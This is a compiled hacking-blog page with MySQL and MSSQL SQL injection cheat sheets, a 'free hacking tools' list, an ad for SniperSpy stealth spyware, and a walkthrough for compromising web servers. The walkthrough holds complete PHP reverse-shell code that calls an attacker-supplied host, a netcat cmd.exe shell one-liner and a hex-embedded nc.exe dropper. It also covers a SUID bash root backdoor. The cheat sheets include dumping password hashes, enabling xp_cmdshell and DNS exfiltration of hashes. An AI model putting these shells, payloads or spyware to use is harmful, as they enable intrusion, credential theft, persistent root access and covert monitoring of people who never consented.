MySQL SQLi Cheat Sheet

-------------------
Version
-------------------
SELECT @@version

------------------------
Comments
------------------------
SELECT 1; #comment
SELECT /*comment*/1;


--------------------------
Current User
-------------------------
SELECT user();
SELECT system_user();

---------------------------------------
List Users
---------------------------------------
SELECT user FROM mysql.user; -- priv

---------------------------------------
List Password Hashes
---------------------------------------
SELECT host, user, password FROM mysql.user; -- priv


---------------------------------------
List Privileges
---------------------------------------
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs

SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs

SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)

SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns


---------------------------------------
List DBA Accounts
---------------------------------------
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';

SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv


---------------------------------------
Current Database
---------------------------------------
SELECT database()


---------------------------------------
List Databases
---------------------------------------
SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db -- priv


---------------------------------------
List Columns
---------------------------------------
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'


---------------------------------------
List Tables
---------------------------------------
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'


---------------------------------------
Find Tables From Column Name
---------------------------------------
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find table which have a column called 'username'


--------------------------------------
Select Nth Row
-------------------------------------
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0

--------------------------------------
Select Nth Char
-------------------------------------
SELECT substr('abcd', 3, 1); # returns c


--------------------------------------
Bitwise AND
-------------------------------------
SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0

--------------------------------------
ASCII Value -> Char
-------------------------------------
SELECT char(65); # returns A



--------------------------------------
Char -> ASCII Value
-------------------------------------
SELECT ascii('A'); # returns 65



--------------------------------------
Casting
-------------------------------------
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);



--------------------------------------
String Concatenation
-------------------------------------
SELECT CONCAT('A','B'); #returns AB
SELECT CONCAT('A','B','C'); # returns ABC

-------------------------------------
If Statement
-------------------------------------
SELECT if(1=1,'foo','bar'); -- returns 'foo'


-------------------------------------
Case Statement
-------------------------------------
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A


-------------------------------------
Avoiding Quotes
-------------------------------------
SELECT 0x414243; # returns ABC


-------------------------------------
Time Delay
-------------------------------------
SELECT BENCHMARK(1000000,MD5('A'));
SELECT SLEEP(5); # >= 5.0.12


-------------------------------------
Make DNS Requests
-------------------------------------
null

-------------------------------------
Command Execution
-------------------------------------
If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform.


-------------------------------------
Local File Access
-------------------------------------
...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read world-readable files.
SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file system

-------------------------------------
Hostname, IP Address
-------------------------------------
null


-------------------------------------
Create Users
-------------------------------------
CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv



-------------------------------------
Delete Users
-------------------------------------
DROP USER test1; -- priv


-------------------------------------
Make User DBA
-------------------------------------
GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv


-------------------------------------
Location of DB files
-------------------------------------
SELECT @@datadir;


-------------------------------------
Default/System Databases
-------------------------------------
information_schema (>= mysql 5.0)
mysql



Reference : pentestmonkey.net

MSSQLi Cheat Sheet

-------------------
Version
-------------------
SELECT @@version

------------------------
Comments
------------------------
SELECT 1 -- comment
SELECT /*comment*/1


--------------------------
Current User
-------------------------
SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

---------------------------------------
List Users
---------------------------------------
SELECT name FROM master..syslogins

---------------------------------------
List Password Hashes
---------------------------------------
SELECT name, password FROM master..sysxlogins -- priv, mssql 2000;
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
SELECT name, password_hash FROM master.sys.sql_logins -- priv, mssql 2005;
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -- priv, mssql 2005


---------------------------------------
List Privileges
---------------------------------------
null


---------------------------------------
List DBA Accounts
---------------------------------------
TODO
SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin? returns 1 for true, 0 for false, NULL for invalid role. Also try 'bulkadmin', 'systemadmin' and other values from the documentation
SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.


---------------------------------------
Current Database
---------------------------------------
SELECT DB_NAME()


---------------------------------------
List Databases
---------------------------------------
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, ...

---------------------------------------
List Columns
---------------------------------------
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list colum names and types for master..sometable

---------------------------------------
List Tables
---------------------------------------
SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list colum names and types for master..sometable


---------------------------------------
Find Tables From Column Name
---------------------------------------
-- NB: This example works only for the current database. If you wan't to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects).
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- this lists table, column for each column containing the word 'password'


--------------------------------------
Select Nth Row
-------------------------------------
SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row


--------------------------------------
Select Nth Char
-------------------------------------
SELECT substring('abcd', 3, 1) -- returns c


--------------------------------------
Bitwise AND
-------------------------------------
SELECT 6 & 2 -- returns 2
SELECT 6 & 1 -- returns 0

--------------------------------------
ASCII Value -> Char
-------------------------------------
SELECT char(0x41) -- returns A



--------------------------------------
Char -> ASCII Value
-------------------------------------
sELECT ascii('A') - returns 65

--------------------------------------
Casting
-------------------------------------
SELECT CAST('1' as int);
SELECT CAST(1 as char)


--------------------------------------
String Concatenation
-------------------------------------
SELECT 'A' + 'B' - returns AB

-------------------------------------
If Statement
-------------------------------------
IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1


-------------------------------------
Case Statement
-------------------------------------
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1


-------------------------------------
Avoiding Quotes
-------------------------------------
SELECT char(65)+char(66) -- returns AB


-------------------------------------
Time Delay
-------------------------------------
WAITFOR DELAY '0:0:5' -- pause for 5 seconds


-------------------------------------
Make DNS Requests
-------------------------------------
declare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); -- nonpriv, works on 2000

declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini'''); -- priv, works on 2005

-- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.
-- Also check out theDNS tunnel feature of sqlninja

-------------------------------------
Command Execution
-------------------------------------
EXEC xp_cmdshell 'net user'; -- priv

On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
EXEC sp_configure 'show advanced options', 1; -- priv
RECONFIGURE; -- priv
EXEC sp_configure 'xp_cmdshell', 1; -- priv
RECONFIGURE; -- priv


-------------------------------------
Local File Access
-------------------------------------
CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM 'c:\boot.ini';
DROP TABLE mydata;

-------------------------------------
Hostname, IP Address
-------------------------------------
SELECT HOST_NAME()


-------------------------------------
Create Users
-------------------------------------
EXEC sp_addlogin 'user', 'pass'; -- priv

-------------------------------------
Drop Users
-------------------------------------
EXEC sp_droplogin 'user'; -- priv


-------------------------------------
Make User DBA
-------------------------------------
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; -- priv


-------------------------------------
Location of DB files
-------------------------------------
TODO


-------------------------------------
Default/System Databases
-------------------------------------
northwind
model
msdb
pubs
tempdb


Reference : pentestmonkey.net

SQLI Hunter: SQL Injection Hunter

“SQLI Hunter” SQL Injection Hunter 1.0 dari namanya sudah jelas bahawa aplikasi ini berfungsi untuk mencari website yang lemah terhadap serangan SQL Injection. Dilengkapi 4493 Dorks, dan  Dilengkapi juga Pencari Login Page Admin.

DOWNLOAD DISINI (INSTALL VERSION – Perlukan .NET Framework 3.5)


atau

DOWNLOAD DISINI (PORTABLE VERSION)


Selamat mencuba dan menggunakannya dengan baik !!!

Free Hacking Tools

If you´re interested in hacking, you´ll need a good set of base tools with which to work. Hopefully, there are many free hacking tools online which can help you . Below you can find list of hacking tools.


1. Date Cracker 2000
Data Cracker 2000 is an application which can easily remove the date protection(i.e. trail protection) from many software. It is very useful for shareware or trial versions of software which expire after a specific date. When you crack the software with Date Cracker 2000, the software will always show something like “There are 90 days remaining in your trial period” and the software will actually last forever :). Some programs have good protection and it isn’t possible to remove their date protection .

If you want to known how to use Date Cracker visit my older post ” What Is Date Cracker 2000 And How To Use It ”

Date Cracker 2000
Website	http://www.e-tech.ca/003-dc2000.asp
Download Page	http://www.wonderworks.ca/nbia/dc20000.zip
File size	1.5 MB
Video Tutorial	http://www.wonderworks.ca/nbia/dc2000.wmv

2. Advanced Port Scanner
This is small size, very fast and simple for use port scanner . Just type IP Addresses of the computer , that you want to scan and you´ll get detailed descriptions for common ports.

Advanced Port Scanner
Website	http://www.radmin.com/products/utilities/portscanner.php
Download Page	http://www.download.com/Advanced-Port-Scanner
File size	426 KB
Operating System	Windows 95/98/ME/NT4.0/2000/XP/2003/Vista/2008
License:	Free

3. Ophcrack
Ophcrack is great tool which can easy crack or recover lost Windows password . It works using rainbow tables and brute force combined. For more information about this software visit my older post ” How to crack windows XP password “.

Ophcrack
Website	http://ophcrack.sourceforge.net/
Download Page	http://ophcrack.sourceforge.net/download.php?type=ophcrack
File size	4.90 MB
Video Tutorial	Video

4. RAR Password Cracker
This is very effective program, which can easily to crack RAR/WinRAR password, it use a dictionary and a brute force attack.For more informatio about cracking here is detailed tutorial step by step How To Crack The Password Of The RAR File

RAR Password Cracker
Website	http://www.rarpasswordcracker.com/
Download Page	http://www.rarpasswordcracker.com/rpc412_setup.exe
File size	205 Kb
License	Freeware

5. PC Activity Monitor
PC Activity Monitor is an ultimate invisible and undetectable easy-to-use monitoring and surveillance tool for both networked and personal PCs. It is professional software that captures all users activity on the PC. All data collected by the monitoring are saved to encrypted log file. The log file can be optionally sent via e-mail to a specified address (or saved to a specified shared resource in LAN environment) for further inspection and analysis.

PC Activity Monitor
Website	http://3d2f.com/programs/0-545-pc-activity-monitor-pro-download.shtml
Download Page	http://download.softsecurity.com/5/6/pca_pro.zip
File size	1192 kb
License	Shareware
Operating System	Windows 95, Windows 98, Windows ME, Windows NT, Windows 2000, Windows XP

6. Cain & Abel
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of several kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

Cain & Abel
Website	http://www.oxid.it/cain.html
Download Page	http://www.oxid.it/cain.html
File size	660 KB
License	Freeware
Operating System	Windows iNT/2000/XP

7. SpyRemover Pro 3.05
SpyRemover detects and removes more than 140.000 intrusive devices such as spyware, adware, hijackers, keyloggers, Trojans, tracking devices, hacker tools, and other spy devices on your PC. This spyware remover is powerful and easy to use.

SpyRemover
Website	http://3d2f.com/programs/6-183-spyremover-pro-download.shtml
Download Page	http://www.itcompany.com/remover.exe
File size	6172 kb
License	Shareware
Operating System	Windows 95, Windows 98, Windows ME, Windows NT, Windows 2000, Windows XP, Windows 2003, Windows Vista

8. Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Nikto
Website	http://www.cirt.net/nikto2
Download Page	http://www.cirt.net/nikto2
File size	390 kb
License	Freeware

9. SuperScan
SuperScan is an user-friendly tool for cleaning the junk files.Only click your mouse, it clean all the junk files quickly and safely.

SuperScan
Website	http://www.snapfiles.com/publishers/foundstone-inc/index.html
Download Page	http://www.snapfiles.com/download/dlsuperscan.html
File size	196 kb
License	Freeware
Operating System	Windows 2000/XP

10. Yersinia
Yersinia is a network tool designed to take advantage of some weakeness in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems.

Yersinia
Website	http://www.yersinia.net/
Download Page	http://www.yersinia.net/download.htm

11. PuTTY
PuTTY is an SSH client port to the Nokia 9200 Communicator series. The current version contains basic SSH protocol support, terminal emulation, and a bare-bones user interface.

PuTTY
Website	http://www.chiark.greenend.org.uk/~sgtatham/putty/
Download Page	http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
File size	196 kb
License	Freeware
Operating System	Windows 2000/XP

12. Nessus
The Nessus is vulnerability scanner, featuring high speed discovery, configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture. Nessus scanners can be distributed throughout an entire enterprise, inside DMZs, and across physically separate networks.

Nessus
Website	http://www.nessus.org/nessus/
Download Page	http://www.nessus.org/download/
File size	26.51MB
License	Freeware

13. Hping
Hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

Hping
Website	http://www.hping.org//
Download Page	http://www.hping.org/download.php
License	Freeware
Operating System	Linux, FreeBSD, NetBSD, OpenBSD, Solaris, MacOs X, Windows

14. coWPAtty
coWPAtty is designed to audit the security of pre-shared keys selected in WiFi Protected Access (WPA) networks.

coWPAtty
Website	http://wirelessdefence.org/Contents/coWPAttyMain.html
Download Page	http://sourceforge.net/project/downloading.php?group_id=123588&use_mirror=freefr&filename=cowpatty-2.0.tgz&a=31536266
License	Freeware

15. DumpAutoComplete v0.7
This application will search for the default Firefox profile of the user who runs the tool and dump the AutoComplete cache in XML format to standard output. Alternatively, autocomplete files can be passed to the application and they will be parsed as well. This application understands mork based autocomplete files (Firefox 1.x) as well as SQLite based formhistory and webappsstore files (Firefox 2.x).

DumpAutoComplete v0.7
Website	http://www.foundstone.com/us/resources/proddesc/dumpautocomplete.htm
Download Page	http://www.foundstone.com/us/resources/termsofuse.asp?file=dumpautocomplete.zip
License	Freeware

If you want high quality hacking software , I recommend remote spying software SniperSpy . Sniperspy is completely reliable and user-friendly,It is worth price that you pay for it.
SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s! This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access! Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel! This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!




SniperSpy Features:
1. SniperSpy is remotely-deployable spy software
2. Invisibility Stealth Mode Option. Works in complete stealth mode. Undetectable!
3. Logs All Keystrokes


4. Records any Password (Email, Login, Instant Messenger etc.)


5. Remote Monitor Entire IM Conversations so that you can spy on IM activities too
6. Captures a full-size jpg picture of the active window however often you wish
7. Real Time Screen Viewer
8. Remotely reboot or shutdown the PC or choose to logoff the current Windows user
9. Completely Bypasses any Firewall

What if i dont have physical acess to victims computer?



No physical access to your remote PC is needed to install the spy software. Once installed you can view the screen LIVE and browse the file system from anywhere anytime. You can also view chats, websites, keystrokes in any language and more, with screenshots.

This software remotely installs to your computer through email. Unlike the other remote spy titles on the market, SniperSpy is fully and completely compatible with any firewall including Windows XP, Windows Vista and add-on firewalls.

The program then records user activities and sends the data to your online account. You login to your account SECURELY to view logs using your own password-protected login. You can access the LIVE control panel within your secure online account.
Why would I need SniperSpy?

Do you suspect that your child or employee is inappropriately using your unreachable computer? If yes, then this software is ideal for you. If you can’t get to your computer and are worried about the Internet safety or habits of those using it, then you NEED SniperSpy.

This high-tech spy software will allow you to see exactly what your teenager is doing in MySpace and elsewhere in real time. It will also allow you to monitor any employee who uses the company computer(s).

Reverse Connecting Shell In Php

Root Shell is the dream of all hackers. Usually a hackers who entered thgrough a web vulnerability , will upload web shell . with web shell the hacker can execute shell command via Http reques . but still not a true shell web shell , web shell has many limitaions , one of which is it not interactive.

in this article I will explain how to get a true interactive shell of a website that successfully hacked . from the shell I also show example of local exploitation to increase the privileges of regular user ( aphace ) to root and set up a backdoor so tat the hacker can root shell anytime , reverse shell php on Linux.

I use the reverse shell from the site php pentes monkey . net is the article , reverse shell was made purely in php but in only works for UNIX - based OS such as linux . I've tried to modify the reverse shell to workin windows ,  bust have not succeeded , so for windows I would use another approach that is pure php.


Reverse shell has two configurations which hacked - coded into the file in php ,  namely the IP address and port that the server will be contacted by the reverse of this shell . for more flexibility I change these two variables to retrieve the value of Get parameters. 

set_time_limit (0);

$VERSION = "1.0";

$ip = '127.0.0.1';  // CHANGE THIS

$port = 1234;       // CHANGE THIS

$chunk_size = 1400;

Change the two lines that contain the variable $ip and $port becomes as below .

set_time_limit (0);

$VERSION = "1.0";

$ip = $_GET["ip"];

$port = $_GET["port"];

$chunk_size = 1400;

So the complete source code is as rs.php follows :

<?php

set_time_limit (0);

$VERSION = "1.0";

$ip = $_GET["ip"];

$port = $_GET["port"];

$chunk_size = 1400;

$write_a = null;

$error_a = null;

$shell = '/bin/bash -p -i';

$daemon = 0;

$debug = 0;

if (function_exists('pcntl_fork')) {

        // Fork and have the parent process exit

        $pid = pcntl_fork();

        if ($pid == -1) {

               printit("ERROR: Can't fork");

               exit(1);

        }

        if ($pid) {

               exit(0);  // Parent exits

        }

        // Make the current process a session leader

        // Will only succeed if we forked

        if (posix_setsid() == -1) {

               printit("Error: Can't setsid()");

               exit(1);

        }

        $daemon = 1;

} else {

        printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");

}

// Change to a safe directory

chdir("/");

// Remove any umask we inherited

umask(0);

$sock = fsockopen($ip, $port, $errno, $errstr, 30);

if (!$sock) {

        printit("$errstr ($errno)");

        exit(1);

}

// Spawn shell process

$descriptorspec = array(

   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from

   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to

   2 => array("pipe", "w")   // stderr is a pipe that the child will write to

);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {

        printit("ERROR: Can't spawn shell");

        exit(1);

}

// Set everything to non-blocking

// Reason: Occsionally reads will block, even though stream_select tells us they won't

stream_set_blocking($pipes[0], 0);

stream_set_blocking($pipes[1], 0);

stream_set_blocking($pipes[2], 0);

stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {

        // Check for end of TCP connection

        if (feof($sock)) {

               printit("ERROR: Shell connection terminated");

               break;

        }

        // Check for end of STDOUT

        if (feof($pipes[1])) {

               printit("ERROR: Shell process terminated");

               break;

        }

        // Wait until a command is end down $sock, or some

        // command output is available on STDOUT or STDERR

        $read_a = array($sock, $pipes[1], $pipes[2]);

        $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

        // If we can read from the TCP socket, send

        // data to process's STDIN

        if (in_array($sock, $read_a)) {

               if ($debug) printit("SOCK READ");

               $input = fread($sock, $chunk_size);

               if ($debug) printit("SOCK: $input");

               fwrite($pipes[0], $input);

        }

        // If we can read from the process's STDOUT

        // send data down tcp connection

        if (in_array($pipes[1], $read_a)) {

               if ($debug) printit("STDOUT READ");

               $input = fread($pipes[1], $chunk_size);

               if ($debug) printit("STDOUT: $input");

               fwrite($sock, $input);

        }

        // If we can read from the process's STDERR

        // send data down tcp connection

        if (in_array($pipes[2], $read_a)) {

               if ($debug) printit("STDERR READ");

               $input = fread($pipes[2], $chunk_size);

               if ($debug) printit("STDERR: $input");

               fwrite($sock, $input);

        }

}

fclose($sock);

fclose($pipes[0]);

fclose($pipes[1]);

fclose($pipes[2]);

proc_close($process);

// Like print, but does nothing if we've daemonised ourself

// (I can't figure out how to redirect STDOUT like a proper daemon)

function printit ($string) {

        if (!$daemon) {

               print "$string\n";

        }

}

?>

Once the file is created, how to wear it very easy, you only need to enter the file to a website.Then request a PHP file from your browser.For example if you named the file with rs.Php , hen you simply open a browser to the URL http://adress.ip.victim/ rs.php ?ip =  No.port.hacker.adress.ip.hacker.

But first you should have prepared a '' listener '' was on a server owned by hackers.The easiest way is to use netcat program.Netcat on Linux by default already available, while for the windows must first be downloaded from here.

Two pictures below show the conditions when when rs.php on-request , immediately you set netcat to listen on port 443 accepts connections from the victim server and provides a shell for you .I chose port 443 because normally the firewall allows outbound connections on port http and https, if I choose to port 4444 on the server firewall is feared the victim will block the connection because the port that is not common.


 

If you are hosting in place which do not provide ssh access, do not worry, this way you can get an interactive shell like using ssh. Hosting Manager also do not feel safe if they do not provide ssh access to the customer because this way the customer can get shell access like ssh and local exploitation is more liberal.

Privilege Escalation 

Lets continue the scenario.

Once we get shell access as user apache { story we managed to hack the victim site by SQL inection attack } . why apache user  ? because the web server happen to run wih privileged User Apache .


Uname command hows that the hosting server using linux with krnels that are vulnerable to a nill pointer Deference . that means we can become root on thr hosting server . the image below is the steos taken by the hacker to root.

 

Reverse Rootshell

Having become root by exploiting the kernel , the hacker to install a backdoor so he can get root shell whenever he wants. he will make a copy of / bin / bash to / sbin / basd can be a root { for bash should be SUID root 4775 }. In this way , anyobe who executes / sbin / bash can be a root { for bash shoul be addeb-p option to get rootshell } .

After creating the ? sbin . bash , now rs root . php hackers create a new file that is modified from rs.php. The difference between rs.php and rs root . php only in the row tha contain the wariable $ shell . If the previous Variable $ shell contain / bin / bash , so now the / sbin / bash the root shell that has made hackers.

Now backdoor rsroot.php ready executes  whenever want root shell on the victim server , he just needs to open URL http://addres.ip.victim/ rs.php ? ip = No.port.hacker.adress.ip.hacker.

the figure below show the difference between rs.php and rs root.php. When hackers het root shell y requesting the URL rs root php isible character gained promt is '' # '' which means this is root shell but when a shell in getting through rs.php then gained prompt is '' $ '' which means just normal shell as apache.

Reverse Shell in Windows

file rs.php only applies to UNIX - based servers such as Linux , the file does not apply when the web server runs on windows OS . since the implementation in pure php can not , so I deal with the way the php script executes netcat . exe to give hackers a reverse shell to the server.

In a php script ,  which utilizes netcat . exe reverse shell can be madein single Line :

<?php
system("nc.exe ".$_GET["ip"]." ".$_GET["port"]." -d -e cmd.exe");
?>

The problem is the script above call netcat { nc.exe } who generally do not exist in windows . there are several alternative ways to get nc.exe in windows . The alternative is : 

• Download : nc.exe downloaded from a server.Download can with php or tftp.exe.
• Upload : Created a php file to upload files to wed server.

Of the three alternatives I chose the last option, which is generated because the most practical, no need to download / upload nc.exe separately, just one php file only.he trick is that I change the contents of binary file into a form hexa nc.exe , then put it in the beginning of the php file as a string variable.Then the contents of a string variable will be converted to decimal and binary form is written into the file nc.exe .

 Php script snippet below to change the string variable in the form of hex ($ hex) into the form of an ASCII character (binary) with the functions chr ( ) and stored in the variable $ nc. 

 In this code snippet, the contents of the variable $ hex complete deliberately not written for easy viewing.

<?
$hex=
"310101010255362c043bdfcc7ca3b2ff01141b89b009b9140100d9086c64".
"2feff743a88d6c11006fe4f692cb6f91739192980f96985c8ebcbd659d0b".
"699d40629b669b4a9cdc9e309c27349c1c112dea77e00102a635002f003f".
"43fccddffd00a44700e047017700974800e0488d00984900e049dffccddf".
"8600994b00e04b73009b4d00e04d74009d4f00cddffccde04f75009f5000".
"e0509100a05100e05176f2cddffc00a15200e0529200a25300e0539300a3".
"0000237521721b243100ba78f6fdfbdd3200970300793300230f7a340024".
"077b9df87cf9df250f7c36005e001e7d3700267e38736cf00a1d1a39fd0f".
"cf97ffbc80300029812d005f001f823d002b8397b7db47d47f070e09030f".
"00947100dfde4c6d9f1136e457001707116500456b253614dd1272090407".
"db6f866d13d454f702790059001907155de1ad6dda550407166900094317".
"cdb1c1ee6f004f480018d65013220477fbb55ba2c71a5d9a001dd65553ad".
"0e1b1ce76191a6fe526bd51e815ccc1f6400440004a2c4a76e660046c321".
"671de75bc78ea222689f083f236a004a4b3460e1246b006f0b9a164cffda".
"efcb000c263b003a4e27272a072860007eca42903a95225c28beb5c7747a".
"005a8c062c7800582c7414ef0c2d630043db2e8e56e828de51af2f620042".
"f23095b81596c54e1407316d8d3dbe3fdfb100322c003c332e003e073413".
"953487748d352a72740ddbb210a054a2684655749b5b30822e3d70a46a4e".
"57616b6e3304ce3f907cce4058dc82db9a947641a80c6e8e0bcd2d144284".
"6fa6c21470652d140c1e4a1471fe36cb663b4737077748388d49394af0e4".
"d91f842d4b34dcf22c70c0b24d367d742b36cb66794f3175503291513396".
"cdb25976523092532e93bff4bf42e085e087e089e08b09e088e08ae08d72".
"66a48c5ba20337919cc056b224e04881da455c00a5c0d0c5852efd1f5253".
"4453d7cf6e066ef8969fa9d33d46fcf5fc8a7e2600633a5c3e5c5265817d";
$nc = "";
for ($i=0;$i<strlen($hex)/2;$i++) {
    $nc.=chr(hexdec($hex[$i*2].$hex[$i*2+1]));
}
file_put_contents("nc.exe",$nc);
system("nc.exe ".$_GET["ip"]." ".$_GET["port"]." -d -e cmd.exe");
?>

Complete source code reverse shell php on windows can be downloaded here and then extract and put it into a web server belonging to the victim. The figure below shows when rswin.php executable file and providing cmd.exe shell to the hacker's servers running Linux.